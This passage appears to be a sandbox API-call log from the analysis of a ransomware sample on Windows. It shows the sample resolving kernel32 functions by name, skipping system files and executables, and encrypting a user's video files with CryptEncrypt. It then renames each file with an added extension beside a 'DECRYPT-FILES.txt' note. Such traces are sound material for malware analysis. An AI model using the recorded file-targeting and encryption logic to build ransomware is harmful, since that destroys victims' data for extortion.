returned="CreateThreadpoolIo" [0087.109] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.109] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.109] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.109] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.109] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.109] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.109] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.109] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.109] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.109] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.109] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.109] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.109] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.109] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.109] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.110] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.110] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.110] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.110] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.110] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.110] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.110] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.110] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.110] lstrlenA (lpString="DELETEATOM") returned 10 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.110] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.110] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.110] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.110] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.110] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.110] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.110] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.110] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.110] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.111] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.111] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.111] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.111] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.111] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.111] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.111] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.111] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.111] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.111] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.111] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.111] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.111] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.111] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.111] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.111] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.111] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.111] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.112] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.112] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.112] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.112] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.112] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.112] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.112] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.112] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.112] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.112] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.112] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.112] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.112] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.112] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.113] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8XdinFYWI5XC.mkv") returned 53 [0087.113] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8XdinFYWI5XC.mkv.ntVdm") returned 59 [0087.113] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8XdinFYWI5XC.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8xdinfywi5xc.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8XdinFYWI5XC.mkv.ntVdm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8xdinfywi5xc.mkv.ntvdm"), dwFlags=0x0) returned 1 [0087.113] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.113] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.114] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.114] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6408a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae6408a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae666a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.114] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.114] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0087.114] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0087.114] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0087.114] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0087.114] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0087.114] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56287b80, ftCreationTime.dwHighDateTime=0x1d4d313, ftLastAccessTime.dwLowDateTime=0xc82b7070, ftLastAccessTime.dwHighDateTime=0x1d4c5cb, ftLastWriteTime.dwLowDateTime=0xc82b7070, ftLastWriteTime.dwHighDateTime=0x1d4c5cb, nFileSizeHigh=0x0, nFileSizeLow=0x12f67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eD8jo.flv", cAlternateFileName="")) returned 1 [0087.114] lstrcmpiW (lpString1="eD8jo.flv", lpString2="DECRYPT-FILES.txt") returned 1 [0087.114] lstrcmpiW (lpString1="eD8jo.flv", lpString2="autorun.inf") returned 1 [0087.114] lstrcmpiW (lpString1="eD8jo.flv", lpString2="boot.ini") returned 1 [0087.114] lstrcmpiW (lpString1="eD8jo.flv", lpString2="desktop.ini") returned 1 [0087.114] lstrcmpiW (lpString1="eD8jo.flv", lpString2="ntuser.dat") returned -1 [0087.114] lstrcmpiW (lpString1="eD8jo.flv", lpString2="iconcache.db") returned -1 [0087.114] lstrcmpiW (lpString1="eD8jo.flv", lpString2="bootsect.bak") returned 1 [0087.114] lstrcmpiW (lpString1="eD8jo.flv", lpString2="ntuser.dat.log") returned -1 [0087.114] lstrcmpiW (lpString1="eD8jo.flv", lpString2="thumbs.db") returned -1 [0087.114] lstrcmpiW (lpString1="eD8jo.flv", lpString2="Bootfont.bin") returned 1 [0087.114] lstrlenW (lpString="eD8jo.flv") returned 9 [0087.114] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0087.114] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0087.114] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0087.114] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0087.114] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.114] lstrlenW (lpString="eD8jo.flv") returned 9 [0087.115] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.115] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="eD8jo.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eD8jo.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eD8jo.flv" [0087.115] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.115] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eD8jo.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ed8jo.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.115] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=77671) returned 1 [0087.115] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.115] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.115] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.115] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.115] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.116] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.116] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0087.117] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.117] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.118] CloseHandle (hObject=0x414) returned 1 [0087.118] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.118] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.119] CloseHandle (hObject=0x0) returned 0 [0087.119] CloseHandle (hObject=0x410) returned 1 [0087.119] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.120] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.120] GetTickCount () returned 0x114e39c [0087.120] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.120] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.120] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.120] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.121] lstrlenA (lpString="kernel32.dll") returned 12 [0087.121] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.121] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.121] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.121] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.121] lstrlenA (lpString="ADDATOMA") returned 8 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.121] lstrlenA (lpString="ADDATOMW") returned 8 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.121] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.121] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.121] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.121] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.121] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.121] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.121] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.121] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.122] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.122] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.122] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.122] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.122] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.122] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.122] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.122] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") 